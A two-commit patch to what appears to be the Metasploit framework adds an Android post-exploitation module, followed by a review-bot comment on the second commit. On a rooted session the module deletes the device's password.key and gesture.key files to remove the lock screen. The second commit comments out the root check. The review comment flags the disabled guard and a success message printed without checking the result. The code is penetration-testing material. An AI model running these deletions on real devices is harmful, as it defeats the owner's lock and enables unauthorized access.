From 5035db77b840a2aa4806c693cb0bf0a94b66b77c Mon Sep 17 00:00:00 2001
From: Tim
Date: Mon, 25 May 2015 13:37:30 +0100
Subject: [PATCH 1/2] add remove lockscreen for android
---
.../post/android/manage/remove_lock_root.rb | 41 +++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 modules/post/android/manage/remove_lock_root.rb
diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb
new file mode 100644
index 0000000000..8cff239fea
--- /dev/null
+++ b/modules/post/android/manage/remove_lock_root.rb
@@ -0,0 +1,41 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit4 < Msf::Post
+
+ include Msf::Post::Common
+
+ def initialize(info={})
+ super( update_info( info, {
+ 'Name' => "Android Root Remove Device Locks",
+ 'Description' => %q{
+ This module uses root privileges to remove the device lock.
+ In some cases the original lock method will still be present but any key/gesture will
+ unlock the device.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'timwr' ],
+ 'SessionTypes' => [ 'meterpreter', 'shell' ],
+ 'Platform' => 'android',
+ }
+ ))
+ end
+
+ def run
+ id = cmd_exec('id')
+ unless id =~ /root/
+ print_error("This module requires root permissions")
+ return
+ end
+
+ cmd_exec('rm /data/system/password.key')
+ cmd_exec('rm /data/system/gesture.key')
+ end
+
+end
+
From 630057e23f474117e5cce16a0c0860678ce249a7 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Thu, 3 Sep 2015 12:42:51 -0500
Subject: [PATCH 2/2] Implement suggestions from the PR discussion
---
modules/post/android/manage/remove_lock_root.rb | 16 ++++++++++++----
1 file changed, 12 insertions(+), 4 deletions(-)
diff --git a/modules/post/android/manage/remove_lock_root.rb b/modules/post/android/manage/remove_lock_root.rb
index 8cff239fea..9498d0fbec 100644
--- a/modules/post/android/manage/remove_lock_root.rb +++ b/modules/post/android/manage/remove_lock_root.rb @@ -18,6 +18,7 @@ class Metasploit4 < Msf::Post In some cases the original lock method will still be present but any key/gesture will unlock the device. }, + 'Privileged' => true, 'License' => MSF_LICENSE, 'Author' => [ 'timwr' ], 'SessionTypes' => [ 'meterpreter', 'shell' ], @@ -29,12 +30,19 @@ class Metasploit4 < Msf::Post def run id = cmd_exec('id') unless id =~ /root/ - print_error("This module requires root permissions") - return + #print_error("This module requires root permissions") + #return end - cmd_exec('rm /data/system/password.key') - cmd_exec('rm /data/system/gesture.key') + %W{ + /data/system/password.key + /data/system/gesture.key + }.each do |path| + print_status("Removing #{path}") + cmd_exec("rm #{path}") + end + + print_status("Device should be unlocked or no longer require a pin") end end
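Review bot: In the second hunk, commenting out `print_error` and `return` leaves `unless id =~ /root/ … end` as an empty block in `run`, so the `id` call is dead code and the `rm` loop also runs on a session that is not root. Either restore the two guard lines (`print_error("This module requires root permissions")` then `return`) or delete the `id` lookup entirely, if the `'Privileged' => true` entry added in the first hunk is meant to carry that requirement. If the guard stays, note that `/root/` matches that word anywhere in the `id` output, and a check on the uid field such as `/uid=0\(/` is stricter. The closing `print_status("Device should be unlocked or no longer require a pin")` is printed even when both `rm` commands failed, because the `cmd_exec` result is never inspected, so the operator log can record a change that did not happen. A comment above the loop saying the deletion is irreversible would help anyone reconstructing the action later, and `%W{}` can be `%w{}` since nothing is interpolated.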